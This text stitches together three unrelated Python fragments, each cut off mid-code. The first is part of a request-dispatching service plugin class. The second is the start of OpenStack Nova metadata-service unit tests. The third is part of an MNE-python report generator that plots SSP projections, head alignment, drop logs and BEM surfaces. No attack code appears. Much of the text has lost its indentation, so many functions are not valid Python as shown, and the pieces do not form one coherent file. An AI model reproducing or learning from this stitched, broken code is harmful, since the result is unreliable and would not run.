            srv = mgr.driver.start(bll_request=bll_request).proxy()
            reply = srv.sc_handle()
            # .get() blocks until the actor has produced the reply
            result = reply.get()
            srv.sc_complete()
            return result
        except Exception as e:
            LOG.exception('spawn_service failed')
            if srv is not None:
                # Ensure the actor thread does not linger after a failure
                srv.stop()
            response = BllResponse(bll_request)
            if isinstance(e, HTTPError):
                # (e.message: this module is Python 2)
                message = e.message
            elif isinstance(e, BllException):
                # Localize the overview field from the BllException
                prefix = _(e.overview)
                message = _("{0}: {1}").format(prefix, e)
            else:
                message = "%s" % e
            response.error(message.rstrip())
            return response
def handle(self):
"""
Handle the request by dispatching the request to the appropriate
method. Override this method if desired, to implement your own
dispatching and execution of short-running work.
"""
if not self.operation and not self.action:
raise InvalidBllRequestException(self._(
"Operation and action missing"))
method = self._get_method(self.operation, self.action)
if method is None:
raise InvalidBllRequestException(
self._("Unsupported operation: {}").format(self.operation))
if getattr(method, 'is_long', False):
self.response[api.PROGRESS] = dict(percentComplete=0)
self.response[api.STATUS] = api.STATUS_INPROGRESS
polling_interval = 10
if method.im_func.func_code.co_argcount > 1:
# If the long-running method expects an argument, call it
# set to True and expect a polling interval in return
polling_interval = method(True) or polling_interval
self.response[api.POLLING_INTERVAL] = \
getattr(self, api.POLLING_INTERVAL, 10)
self.update_job_status(percentage_complete=0)
return self.response
data = method()
# In cases where we don't have the data in the response, it
# had better be in the return value.
# i.e. compute_summary_service: resource_history()
if not self.response[api.DATA]:
self.response[api.DATA] = data
self.response[api.PROGRESS] = dict(percentComplete=100)
self.response.complete()
return self.response
    def complete(self):
        """
        Complete the request. Override this method and do long running
        processing here.

        The default implementation re-dispatches to the @expose'd method
        (calling it with False when it accepts the handle/complete flag)
        and folds its return value into self.response. Exceptions are
        caught and recorded on the response rather than propagated.

        :return: the (possibly updated) BllResponse, or None when there is
            nothing to dispatch
        """
        if not self.operation and not self.action:
            return
        method = self._get_method(self.operation, self.action)
        if method is None:
            return
        if getattr(method, 'is_long', False):
            try:
                if method.im_func.func_code.co_argcount > 1:
                    # If the long-running method expects an argument, call it
                    # set to False to indicate that it is being called
                    # during complete
                    response = method(False)
                else:
                    response = method()
                # Permit the calling function to just return a normal
                # value, and then just add it to the 'data' element of the
                # existing self.response
                if isinstance(response, BllResponse):
                    self.response = response
                else:
                    self.response[api.DATA] = response
                self.response[api.PROGRESS] = dict(percentComplete=100)
                self.response.complete()
            except Exception as e:
                # Record the failure on the response instead of raising
                self.response.error("%s" % e)
        return self.response
def _get_method(self, operation=None, action=None):
"""
Use inspection to get the name of the @exposed function that
corresponds to the operation and action being requested
If there is only one method whose exposed name matches the operation,
then that method is returned, regardless of the action. If there is
more, then the action will be consulted to decide which to return.
"""
candidates = []
# Find all candidates -- those members whose name matches the
# operation, ignoring the action.
for name, f in inspect.getmembers(self, inspect.ismethod):
# Only look at those that are exposed
if not getattr(f, 'exposed', False):
continue
# If operation is specified, the function must expose that op
op_list = getattr(f, 'operation', [])
if operation and operation not in op_list:
continue
candidates.append((name, f))
if not candidates:
return
# In most cases, there is only a single function with the given
# operation, so we will return that.
if len(candidates) == 1:
name, f = candidates[0]
return f
# If action is specified, the function must expose that action
for name, f in candidates:
if action == getattr(f, 'action', None):
return f
def sc_handle(self):
"""
Handle the request. Called by the SvcCollection class. Do not override,
this method. Override method handle.
"""
context.txn_id = self.request.txn_id
reply = self.handle()
return copy.deepcopy(reply)
    def sc_complete(self):
        """
        Complete the request. Called by the SvcCollection class. Do not
        override this method. Override method 'complete'.

        Runs the long-running phase, publishes the final response for the
        transaction, and always stops this actor afterwards.
        """
        try:
            bll_response = self.complete()
            if bll_response is not None:
                self.put_resource(self.request.txn_id, bll_response)
        except Exception as e:
            LOG.exception('sc_complete failed.')
            # Attach the traceback, then publish the errored response
            self.response.exception(traceback.format_exc())
            self.put_resource(self.request.txn_id, self.response.error(
                "%s" % e))
        finally:
            # The actor's work is done either way; release its thread
            self.stop()
def update_job_status(self, msg=None, percentage_complete=0,
txn_id=None, **kwargs):
if percentage_complete is not None:
self.response[api.PROGRESS] = {api.PERCENT_COMPLETE:
percentage_complete}
if msg:
self.response[api.DATA] = msg
self.response.update(**kwargs)
txn = txn_id or self.txn_id
update_job_status(txn, self.response)
    def put_resource(self, txn_id, msg):
        # Thin wrapper over the module-level update_job_status helper:
        # publishes msg as the stored response for the given transaction.
        update_job_status(txn_id, msg)
@classmethod
def is_available(cls, available_services):
"""
Returns a boolean to indicate whether this plugin is available, i.e.,
that all of the dependent services and requirements that this plugin
needs are available. The function is supplied a lists of openstack
services from keystone that are available.
This check will not be called each time the plugin is executed, so it
can afford to be somewhat slow. It is expected to only be called when
the client (UI) requests a list of available plugins.
"""
needs = cls.needs_services()
for service in needs:
if service not in available_services:
return False
return True
@classmethod
| |
<gh_stars>0
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for metadata service."""
import base64
import hashlib
import hmac
import json
import re
try:
import cPickle as pickle
except ImportError:
import pickle
import mox
from oslo.config import cfg
import webob
from nova.api.metadata import base
from nova.api.metadata import handler
from nova.api.metadata import password
from nova import block_device
from nova.compute import flavors
from nova.conductor import api as conductor_api
from nova import context
from nova import db
from nova.db.sqlalchemy import api
from nova import exception
from nova.network import api as network_api
from nova.objects import instance as instance_obj
from nova import test
from nova.tests import fake_instance
from nova.tests import fake_network
from nova.tests.objects import test_security_group
from nova.virt import netutils
CONF = cfg.CONF
# Canned user-data payload; b64encode on a str works because this module
# is Python 2 (str is bytes)
USER_DATA_STRING = ("This is an encoded string")
ENCODE_USER_DATA_STRING = base64.b64encode(USER_DATA_STRING)
# Template DB record used by the tests to build fake instances
INSTANCE = fake_instance.fake_db_instance(**
    {'id': 1,
     'uuid': 'b65cee2f-8c69-4aeb-be2f-f79742548fc2',
     'name': 'fake',
     'project_id': 'test',
     'key_name': "mykey",
     'key_data': "ssh-rsa AAAAB3Nzai....N3NtHw== someuser@somehost",
     'host': 'test',
     'launch_index': 1,
     'instance_type': {'name': 'm1.tiny'},
     'reservation_id': 'r-xxxxxxxx',
     'user_data': ENCODE_USER_DATA_STRING,
     'image_ref': 7,
     'vcpus': 1,
     'fixed_ips': [],
     'root_device_name': '/dev/sda1',
     'info_cache': {'network_info': []},
     'hostname': 'test.novadomain',
     'display_name': 'my_displayname',
     'metadata': {},
     'system_metadata': {},
     })
def fake_inst_obj(context):
    """Build an Instance object from the canned INSTANCE db record."""
    blank = instance_obj.Instance()
    return instance_obj.Instance._from_db_object(
        context, blank, INSTANCE,
        expected_attrs=['metadata', 'system_metadata'])
def get_default_sys_meta():
    """Return system metadata describing the default flavor."""
    default_flavor = flavors.get_default_flavor()
    return flavors.save_flavor_info({}, default_flavor)
def return_non_existing_address(*args, **kwarg):
    # Stub: simulate an address lookup miss regardless of arguments.
    raise exception.NotFound()
def fake_InstanceMetadata(stubs, inst_data, address=None,
                          sgroups=None, content=None, extra_md=None,
                          vd_driver=None, network_info=None):
    """Build an InstanceMetadata with the security-group DB call stubbed.

    :param stubs: the test's stub manager
    :param inst_data: instance object or db dict to wrap
    :param sgroups: security groups returned by the stubbed lookup
        (defaults to a single group named 'default')
    :param content: injected-file (path, contents) pairs
    :param extra_md: extra metadata merged into meta_data.json
    """
    # Bug fix: content/extra_md previously used mutable default arguments
    # ([] and {}), which are created once at def time and shared across
    # calls -- any mutation would leak between tests.
    if content is None:
        content = []
    if extra_md is None:
        extra_md = {}
    if sgroups is None:
        sgroups = [dict(test_security_group.fake_secgroup,
                        name='default')]

    def sg_get(*args, **kwargs):
        # Stubbed security_group_get_by_instance
        return sgroups
    stubs.Set(api, 'security_group_get_by_instance', sg_get)
    return base.InstanceMetadata(inst_data, address=address,
        content=content, extra_md=extra_md,
        vd_driver=vd_driver, network_info=network_info)
def fake_request(stubs, mdinst, relpath, address="127.0.0.1",
                 fake_get_metadata=None, headers=None,
                 fake_get_metadata_by_instance_id=None):
    """Drive the metadata WSGI handler with a fake webob request.

    :param stubs: the test's stub manager (may be None to skip stubbing)
    :param mdinst: the InstanceMetadata returned by the stubbed lookup
    :param relpath: request path, e.g. '/2009-04-04/meta-data/'
    :param address: remote address the handler sees
    :param fake_get_metadata: optional replacement for the
        address-based metadata lookup (defaults to returning mdinst)
    :param headers: extra request headers
    :param fake_get_metadata_by_instance_id: optional replacement for the
        instance-id-based lookup
    :return: the webob Response produced by the handler
    """
    def get_metadata_by_remote_address(address):
        # Default lookup stub: every address resolves to mdinst
        return mdinst
    app = handler.MetadataRequestHandler()
    if fake_get_metadata is None:
        fake_get_metadata = get_metadata_by_remote_address
    if stubs:
        stubs.Set(app, 'get_metadata_by_remote_address', fake_get_metadata)
    if fake_get_metadata_by_instance_id:
        stubs.Set(app, 'get_metadata_by_instance_id',
                  fake_get_metadata_by_instance_id)
    request = webob.Request.blank(relpath)
    request.remote_addr = address
    if headers is not None:
        request.headers.update(headers)
    response = request.get_response(app)
    return response
class MetadataTestCase(test.TestCase):
    """Tests for the EC2-style instance metadata (base.InstanceMetadata)."""
    def setUp(self):
        super(MetadataTestCase, self).setUp()
        # A fresh fake instance with default-flavor system metadata, and
        # the network-info API stubbed out for every test
        self.context = context.RequestContext('fake', 'fake')
        self.instance = fake_inst_obj(self.context)
        self.instance.system_metadata = get_default_sys_meta()
        self.flags(use_local=True, group='conductor')
        fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs)
    def test_can_pickle_metadata(self):
        # Make sure that InstanceMetadata is possible to pickle. This is
        # required for memcache backend to work correctly.
        md = fake_InstanceMetadata(self.stubs, self.instance.obj_clone())
        pickle.dumps(md, protocol=0)
    def test_user_data(self):
        inst = self.instance.obj_clone()
        inst['user_data'] = base64.b64encode("happy")
        md = fake_InstanceMetadata(self.stubs, inst)
        # user-data must come back base64-decoded
        self.assertEqual(
            md.get_ec2_metadata(version='2009-04-04')['user-data'], "happy")
    def test_no_user_data(self):
        inst = self.instance.obj_clone()
        inst.user_data = None
        md = fake_InstanceMetadata(self.stubs, inst)
        # Sentinel object: the key must be absent, not merely falsy
        obj = object()
        self.assertEqual(
            md.get_ec2_metadata(version='2009-04-04').get('user-data', obj),
            obj)
    def test_security_groups(self):
        inst = self.instance.obj_clone()
        sgroups = [dict(test_security_group.fake_secgroup, name='default'),
                   dict(test_security_group.fake_secgroup, name='other')]
        expected = ['default', 'other']
        md = fake_InstanceMetadata(self.stubs, inst, sgroups=sgroups)
        data = md.get_ec2_metadata(version='2009-04-04')
        self.assertEqual(data['meta-data']['security-groups'], expected)
    def test_local_hostname_fqdn(self):
        md = fake_InstanceMetadata(self.stubs, self.instance.obj_clone())
        data = md.get_ec2_metadata(version='2009-04-04')
        # local-hostname is the instance hostname qualified with dhcp_domain
        self.assertEqual(data['meta-data']['local-hostname'],
            "%s.%s" % (self.instance['hostname'], CONF.dhcp_domain))
    def test_format_instance_mapping(self):
        # Make sure that _format_instance_mappings works.
        ctxt = None
        instance_ref0 = {'id': 0,
                         'uuid': 'e5fe5518-0288-4fa3-b0c4-c79764101b85',
                         'root_device_name': None}
        instance_ref1 = {'id': 0,
                         'uuid': 'b65cee2f-8c69-4aeb-be2f-f79742548fc2',
                         'root_device_name': '/dev/sda1'}
        def fake_bdm_get(ctxt, uuid):
            # One volume, one swap and one ephemeral block device
            return [{'volume_id': 87654321,
                     'snapshot_id': None,
                     'no_device': None,
                     'source_type': 'volume',
                     'destination_type': 'volume',
                     'delete_on_termination': True,
                     'device_name': '/dev/sdh'},
                    {'volume_id': None,
                     'snapshot_id': None,
                     'no_device': None,
                     'source_type': 'blank',
                     'destination_type': 'local',
                     'guest_format': 'swap',
                     'delete_on_termination': None,
                     'device_name': '/dev/sdc'},
                    {'volume_id': None,
                     'snapshot_id': None,
                     'no_device': None,
                     'source_type': 'blank',
                     'destination_type': 'local',
                     'guest_format': None,
                     'delete_on_termination': None,
                     'device_name': '/dev/sdb'}]
        self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
                       fake_bdm_get)
        expected = {'ami': 'sda1',
                    'root': '/dev/sda1',
                    'ephemeral0': '/dev/sdb',
                    'swap': '/dev/sdc',
                    'ebs0': '/dev/sdh'}
        capi = conductor_api.LocalAPI()
        # Without a root device the default mappings are returned
        self.assertEqual(base._format_instance_mapping(capi, ctxt,
                         instance_ref0), block_device._DEFAULT_MAPPINGS)
        self.assertEqual(base._format_instance_mapping(capi, ctxt,
                         instance_ref1), expected)
    def test_pubkey(self):
        md = fake_InstanceMetadata(self.stubs, self.instance.obj_clone())
        pubkey_ent = md.lookup("/2009-04-04/meta-data/public-keys")
        self.assertEqual(base.ec2_md_print(pubkey_ent),
            "0=%s" % self.instance['key_name'])
        self.assertEqual(base.ec2_md_print(pubkey_ent['0']['openssh-key']),
            self.instance['key_data'])
    def test_image_type_ramdisk(self):
        inst = self.instance.obj_clone()
        inst['ramdisk_id'] = 'ari-853667c0'
        md = fake_InstanceMetadata(self.stubs, inst)
        data = md.lookup("/latest/meta-data/ramdisk-id")
        self.assertIsNotNone(data)
        self.assertTrue(re.match('ari-[0-9a-f]{8}', data))
    def test_image_type_kernel(self):
        inst = self.instance.obj_clone()
        inst['kernel_id'] = 'aki-c2e26ff2'
        md = fake_InstanceMetadata(self.stubs, inst)
        data = md.lookup("/2009-04-04/meta-data/kernel-id")
        self.assertTrue(re.match('aki-[0-9a-f]{8}', data))
        # The /ec2 alias must resolve to the same entry
        self.assertEqual(
            md.lookup("/ec2/2009-04-04/meta-data/kernel-id"), data)
        # Without a kernel, the path must not exist at all
        inst.kernel_id = None
        md = fake_InstanceMetadata(self.stubs, inst)
        self.assertRaises(base.InvalidMetadataPath,
                          md.lookup, "/2009-04-04/meta-data/kernel-id")
    def test_check_version(self):
        inst = self.instance.obj_clone()
        md = fake_InstanceMetadata(self.stubs, inst)
        # _check_version(required, requested): requested >= required
        self.assertTrue(md._check_version('1.0', '2009-04-04'))
        self.assertFalse(md._check_version('2009-04-04', '1.0'))
        self.assertFalse(md._check_version('2009-04-04', '2008-09-01'))
        self.assertTrue(md._check_version('2008-09-01', '2009-04-04'))
        self.assertTrue(md._check_version('2009-04-04', '2009-04-04'))
    def test_InstanceMetadata_uses_passed_network_info(self):
        network_info = []
        # mox expectation: the passed-in network_info must be used directly
        self.mox.StubOutWithMock(netutils, "get_injected_network_template")
        netutils.get_injected_network_template(network_info).AndReturn(False)
        self.mox.ReplayAll()
        base.InstanceMetadata(fake_inst_obj(self.context),
                              network_info=network_info)
    def test_InstanceMetadata_invoke_metadata_for_config_drive(self):
        inst = self.instance.obj_clone()
        inst_md = base.InstanceMetadata(inst)
        # Every config-drive entry must have a non-None path
        for (path, value) in inst_md.metadata_for_config_drive():
            self.assertIsNotNone(path)
    def test_InstanceMetadata_queries_network_API_when_needed(self):
        network_info_from_api = []
        # mox expectation: without network_info, the network API is queried
        self.mox.StubOutWithMock(network_api.API, "get_instance_nw_info")
        network_api.API.get_instance_nw_info(
            mox.IgnoreArg(),
            mox.IgnoreArg()).AndReturn(network_info_from_api)
        self.mox.StubOutWithMock(netutils, "get_injected_network_template")
        netutils.get_injected_network_template(
            network_info_from_api).AndReturn(False)
        self.mox.ReplayAll()
        base.InstanceMetadata(fake_inst_obj(self.context))
    def test_local_ipv4_from_nw_info(self):
        nw_info = fake_network.fake_get_instance_nw_info(self.stubs,
                                                         num_networks=2)
        expected_local = "192.168.1.100"
        md = fake_InstanceMetadata(self.stubs, self.instance,
                                   network_info=nw_info)
        data = md.get_ec2_metadata(version='2009-04-04')
        self.assertEqual(data['meta-data']['local-ipv4'], expected_local)
    def test_local_ipv4_from_address(self):
        nw_info = fake_network.fake_get_instance_nw_info(self.stubs,
                                                         num_networks=2)
        # An explicit address overrides the one from network info
        expected_local = "fake"
        md = fake_InstanceMetadata(self.stubs, self.instance,
                                   network_info=nw_info, address="fake")
        data = md.get_ec2_metadata(version='2009-04-04')
        self.assertEqual(data['meta-data']['local-ipv4'], expected_local)
    def test_local_ipv4_from_nw_none(self):
        # No networks at all: local-ipv4 falls back to empty string
        md = fake_InstanceMetadata(self.stubs, self.instance,
                                   network_info=[])
        data = md.get_ec2_metadata(version='2009-04-04')
        self.assertEqual(data['meta-data']['local-ipv4'], '')
class OpenStackMetadataTestCase(test.TestCase):
    def setUp(self):
        super(OpenStackMetadataTestCase, self).setUp()
        # A fresh fake instance with default-flavor system metadata, and
        # the network-info API stubbed out for every test
        self.context = context.RequestContext('fake', 'fake')
        self.instance = fake_inst_obj(self.context)
        self.instance['system_metadata'] = get_default_sys_meta()
        self.flags(use_local=True, group='conductor')
        fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs)
    def test_with_primitive_instance(self):
        # Passing the raw db record (not an Instance object) must work too
        mdinst = fake_InstanceMetadata(self.stubs, INSTANCE)
        result = mdinst.lookup('/openstack')
        self.assertIn('latest', result)
    def test_top_level_listing(self):
        # request for /openstack/<version>/ should show metadata.json
        inst = self.instance.obj_clone()
        mdinst = fake_InstanceMetadata(self.stubs, inst)
        result = mdinst.lookup("/openstack")
        # trailing / should not affect anything
        self.assertEqual(result, mdinst.lookup("/openstack/"))
        # the 'content' should not show up in directory listing
        self.assertNotIn(base.CONTENT_DIR, result)
        self.assertIn('2012-08-10', result)
        self.assertIn('latest', result)
    def test_version_content_listing(self):
        # request for /openstack/<version>/ should show metadata.json
        inst = self.instance.obj_clone()
        mdinst = fake_InstanceMetadata(self.stubs, inst)
        listing = mdinst.lookup("/openstack/2012-08-10")
        self.assertIn("meta_data.json", listing)
def test_metadata_json(self):
inst = self.instance.obj_clone()
content = [
('/etc/my.conf', "content of my.conf"),
('/root/hello', "content of /root/hello"),
]
mdinst = fake_InstanceMetadata(self.stubs, inst,
content=content)
mdjson = mdinst.lookup("/openstack/2012-08-10/meta_data.json")
mdjson = mdinst.lookup("/openstack/latest/meta_data.json")
mddict = json.loads(mdjson)
self.assertEqual(mddict['uuid'], self.instance['uuid'])
self.assertIn('files', mddict)
self.assertIn('public_keys', mddict)
self.assertEqual(mddict['public_keys'][self.instance['key_name']],
self.instance['key_data'])
self.assertIn('launch_index', mddict)
self.assertEqual(mddict['launch_index'], self.instance['launch_index'])
# verify that each of the things we put in content
# resulted in an entry in 'files', that their content
# there is as expected, and that /content lists them.
for (path, content) in content:
fent = [f for f in mddict['files'] if f['path'] == path]
self.assertTrue((len(fent) == 1))
fent = fent[0]
found = mdinst.lookup("/openstack%s" % fent['content_path'])
self.assertEqual(found, content)
def test_extra_md(self):
# make sure extra_md makes it through to metadata
inst = self.instance.obj_clone()
extra = {'foo': 'bar', 'mylist': [1, 2, 3],
'mydict': {"one": 1, "two": 2}}
mdinst = fake_InstanceMetadata(self.stubs, inst, extra_md=extra)
mdjson = mdinst.lookup("/openstack/2012-08-10/meta_data.json")
mddict = json.loads(mdjson)
for key, val in extra.iteritems():
self.assertEqual(mddict[key], val)
def test_password(self):
# make sure extra_md makes it through to metadata
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
result = mdinst.lookup("/openstack/latest/password")
self.assertEqual(result, password.handle_password)
def test_userdata(self):
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
userdata_found = mdinst.lookup("/openstack/2012-08-10/user_data")
self.assertEqual(USER_DATA_STRING, userdata_found)
# since we had user-data in this instance, it should be in listing
self.assertIn('user_data', mdinst.lookup("/openstack/2012-08-10"))
inst.user_data = None
mdinst = fake_InstanceMetadata(self.stubs, inst)
# since this instance had no user-data it should not be there.
self.assertNotIn('user_data', mdinst.lookup("/openstack/2012-08-10"))
self.assertRaises(base.InvalidMetadataPath,
mdinst.lookup, "/openstack/2012-08-10/user_data")
def test_random_seed(self):
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
# verify that 2013-04-04 has the 'random' field
mdjson = mdinst.lookup("/openstack/2013-04-04/meta_data.json")
mddict = json.loads(mdjson)
self.assertIn("random_seed", mddict)
self.assertEqual(len(base64.b64decode(mddict["random_seed"])), 512)
# verify that older version do not have it
mdjson = mdinst.lookup("/openstack/2012-08-10/meta_data.json")
self.assertNotIn("random_seed", json.loads(mdjson))
def test_no_dashes_in_metadata(self):
# top level entries in meta_data should not contain '-' in their name
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
mdjson = json.loads(mdinst.lookup("/openstack/latest/meta_data.json"))
self.assertEqual([], [k for k in mdjson.keys() if k.find("-") != -1])
def test_vendor_data_presense(self):
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
# verify that 2013-10-17 has the vendor_data.json file
result = mdinst.lookup("/openstack/2013-10-17")
self.assertIn('vendor_data.json', result)
# verify that older version do not have it
result = mdinst.lookup("/openstack/2013-04-04")
self.assertNotIn('vendor_data.json', result)
def test_vendor_data_response(self):
inst = self.instance.obj_clone()
mydata = {'mykey1': 'value1', 'mykey2': 'value2'}
class myVdriver(base.VendorDataDriver):
def __init__(self, *args, **kwargs):
super(myVdriver, self).__init__(*args, **kwargs)
data = mydata.copy()
uuid = kwargs['instance']['uuid']
data.update({'inst_uuid': uuid})
self.data = data
def get(self):
return self.data
mdinst = fake_InstanceMetadata(self.stubs, inst, vd_driver=myVdriver)
# verify that 2013-10-17 has the vendor_data.json file
vdpath = "/openstack/2013-10-17/vendor_data.json"
vd = json.loads(mdinst.lookup(vdpath))
# the instance should be passed through, and our class copies the
# uuid through to 'inst_uuid'.
self.assertEqual(vd['inst_uuid'], inst['uuid'])
# check the other expected values
for k, v in mydata.items():
self.assertEqual(vd[k], v)
class MetadataHandlerTestCase(test.TestCase):
"""Test that metadata is returning proper values."""
def setUp(self):
super(MetadataHandlerTestCase, self).setUp()
fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs)
self.context = context.RequestContext('fake', 'fake')
self.instance = fake_inst_obj(self.context)
self.instance.system_metadata = get_default_sys_meta()
self.flags(use_local=True, group='conductor')
self.mdinst = fake_InstanceMetadata(self.stubs, self.instance,
address=None, sgroups=None)
def test_callable(self):
def verify(req, meta_data):
| |
if bad_file is not None:
sss_info.load_bad_channels(bad_file)
if sss_info is not None:
sss_info = sss_info.info
# pca / erm / erm_pca
extra_raws = dict()
for key, which, erm in [
('raw_pca', 'pca', False),
('raw_erm', 'raw', 'only'),
('raw_erm_pca', 'pca', 'only')]:
these_fnames = get_raw_fnames(
p, subj, which, erm, False, run_indices[si])
if len(these_fnames) and all(op.isfile(f) for f in these_fnames):
extra_raws[key], _ = _concat_resamp_raws(
p, subj, these_fnames, 'all', preload=True)
extra_raws[key].apply_proj()
raw_pca = extra_raws.get('raw_pca', None)
raw_erm = extra_raws.get('raw_erm', None)
raw_erm_pca = extra_raws.get('raw_erm_pca', None)
del extra_raws
# epochs
epochs_fname, _ = get_epochs_evokeds_fnames(p, subj, p.analyses)
_, epochs_fname = epochs_fname
has_epochs = op.isfile(epochs_fname)
# whitening and source localization
inv_dir = op.join(p.work_dir, subj, p.inverse_dir)
has_fwd = op.isfile(op.join(p.work_dir, subj, p.forward_dir,
subj + p.inv_tag + '-fwd.fif'))
with report_context():
#
# Custom pre-fun
#
pre_fun = p.report_params.get('pre_fun', None)
if pre_fun is not None:
print(' Pre fun ...'.ljust(LJUST), end='')
t0 = time.time()
pre_fun(report, p, subj)
print('%5.1f sec' % ((time.time() - t0),))
#
# Head coils
#
if p.report_params.get('good_hpi_count', True) and p.movecomp:
_report_good_hpi(report, fnames, p, subj)
else:
print(' HPI count skipped')
#
# cHPI SNR
#
if p.report_params.get('chpi_snr', True) and p.movecomp:
_report_chpi_snr(report, fnames, p, subj)
else:
print(' cHPI SNR skipped')
#
# Head movement
#
if p.report_params.get('head_movement', True) and p.movecomp:
_report_head_movement(report, fnames, p, subj, run_indices[si])
else:
print(' Head movement skipped')
#
# Raw segments
#
if p.report_params.get('raw_segments', True) and \
raw_pca is not None:
_report_raw_segments(report, raw_pca)
else:
print(' Raw segments skipped')
#
# PSD
#
if p.report_params.get('psd', True):
_report_raw_psd(report, raw, raw_pca, raw_erm, raw_erm_pca, p)
else:
print(' PSD skipped')
#
# SSP
#
section = 'SSP topomaps'
proj_nums = _proj_nums(p, subj)
if p.report_params.get('ssp_topomaps', True) and \
raw_pca is not None and np.sum(proj_nums) > 0:
assert sss_info is not None
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
figs = []
comments = []
proj_files = get_proj_fnames(p, subj)
duration = raw.times[-1]
if p.proj_extra is not None:
comments.append('Custom')
projs = read_proj(op.join(p.work_dir, subj, p.pca_dir,
p.proj_extra))
figs.append(plot_projs_topomap(projs, info=sss_info,
show=False))
if any(proj_nums[2]): # ERM
if 'preproc_cont-proj.fif' in proj_files:
if p.cont_as_esss:
extra = ' (eSSS)'
use_info = raw.info
else:
extra = ''
use_info = sss_info
comments.append('Continuous%s' % (extra,))
figs.append(_proj_fig(op.join(
p.work_dir, subj, p.pca_dir,
'preproc_cont-proj.fif'), use_info,
proj_nums[2], p.proj_meg, 'ERM', None,
duration))
if any(proj_nums[0]): # ECG
if 'preproc_ecg-proj.fif' in proj_files:
ecg_channel = _handle_dict(p.ecg_channel, subj)
comments.append('ECG')
figs.append(_proj_fig(op.join(
p.work_dir, subj, p.pca_dir,
'preproc_ecg-proj.fif'), sss_info,
proj_nums[0], p.proj_meg, 'ECG', ecg_channel,
duration))
for idx, kind in ((1, 'EOG'), (3, 'HEOG'), (4, 'VEOG')):
if any(proj_nums[idx]): # Blink
bk = dict(EOG='Blink').get(kind, kind)
if f'preproc_{bk.lower()}-proj.fif' in proj_files:
eog_channel = _handle_dict(
getattr(p, f'{kind.lower()}_channel'), subj)
comments.append(dict(EOG='Blink').get(kind, kind))
figs.append(_proj_fig(op.join(
p.work_dir, subj, p.pca_dir,
f'preproc_{bk.lower()}-proj.fif'), sss_info,
proj_nums[idx], p.proj_meg, kind, eog_channel,
duration))
captions = ['SSP epochs: %s' % c for c in comments]
report.add_figs_to_section(
figs, captions, section, image_format='png',
comments=comments)
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
#
# Source alignment
#
section = 'Source alignment'
source_alignment = p.report_params.get('source_alignment', True)
if source_alignment is True or isinstance(source_alignment, dict) \
and has_sss and has_fwd:
assert sss_info is not None
kwargs = source_alignment
if isinstance(source_alignment, dict):
kwargs = dict(**source_alignment)
else:
assert source_alignment is True
kwargs = dict()
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
captions = [section]
try:
mne.viz.get_3d_backend() is not None
except Exception:
warnings.warn('Cannot plot alignment in Report, mayavi '
'could not be imported')
else:
subjects_dir = mne.utils.get_subjects_dir(
p.subjects_dir, raise_error=True)
bem, src, trans, _ = _get_bem_src_trans(
p, sss_info, subj, struc)
if len(mne.pick_types(sss_info, meg=True)):
coord_frame = 'meg'
else:
coord_frame = 'head'
with mlab_offscreen():
fig = mne.viz.create_3d_figure(
bgcolor=(0., 0., 0.), size=(1000, 1000))
for key, val in (
('info', sss_info),
('subjects_dir', subjects_dir), ('bem', bem),
('dig', True), ('coord_frame', coord_frame),
('show_axes', True), ('fig', fig),
('trans', trans), ('src', src)):
kwargs[key] = kwargs.get(key, val)
try_surfs = [('head-dense', 'inner_skull'),
('head', 'inner_skull'),
'head',
'inner_skull']
ex = None
for surf in try_surfs:
try:
mne.viz.plot_alignment(surfaces=surf, **kwargs)
except Exception as exc:
ex = exc
else:
break
else:
print(
'\nCould not plot any surface for alignment '
f'for {subj}:\n{try_surfs}\nGot error:\n')
raise ex from None
del ex
try:
fig.scene.parallel_projection = True
except AttributeError:
pass
view = list()
for ai, angle in enumerate([180, 90, 0]):
mne.viz.set_3d_view(
fig, angle, 90, focalpoint=(0., 0., 0.),
distance=0.6)
try:
screenshot = fig.plotter.screenshot()
except AttributeError:
from mayavi import mlab
screenshot = mlab.screenshot(fig)
view.append(screenshot)
try:
fig.plotter.close()
except AttributeError:
from mayavi import mlab
mlab.close(fig)
view = trim_bg(np.concatenate(view, axis=1), 0)
report.add_figs_to_section(view, captions, section)
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
#
# Drop log
#
section = 'Drop log'
if p.report_params.get('drop_log', True) and has_epochs:
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
epo = read_epochs(epochs_fname)
figs = [epo.plot_drop_log(subject=subj, show=False)]
captions = [repr(epo)]
report.add_figs_to_section(figs, captions, section,
image_format='svg')
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
#
# BEM
#
section = 'BEM'
if p.report_params.get('bem', True) and has_fwd:
caption = '%s: %s' % (section, struc)
bem, src, trans, _ = _get_bem_src_trans(
p, raw.info, subj, struc)
if not bem['is_sphere']:
subjects_dir = mne.utils.get_subjects_dir(
p.subjects_dir, raise_error=True)
mri_fname = op.join(subjects_dir, struc, 'mri', 'T1.mgz')
if not op.isfile(mri_fname):
warnings.warn(
'Could not find MRI:\n%s\nIf using surrogate '
'subjects, use '
'params.report_params["bem"] = False to avoid '
'this warning', stacklevel=2)
else:
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
with use_log_level('error'):
report.add_bem_to_section(
struc, caption, section, decim=10, n_jobs=1,
subjects_dir=subjects_dir)
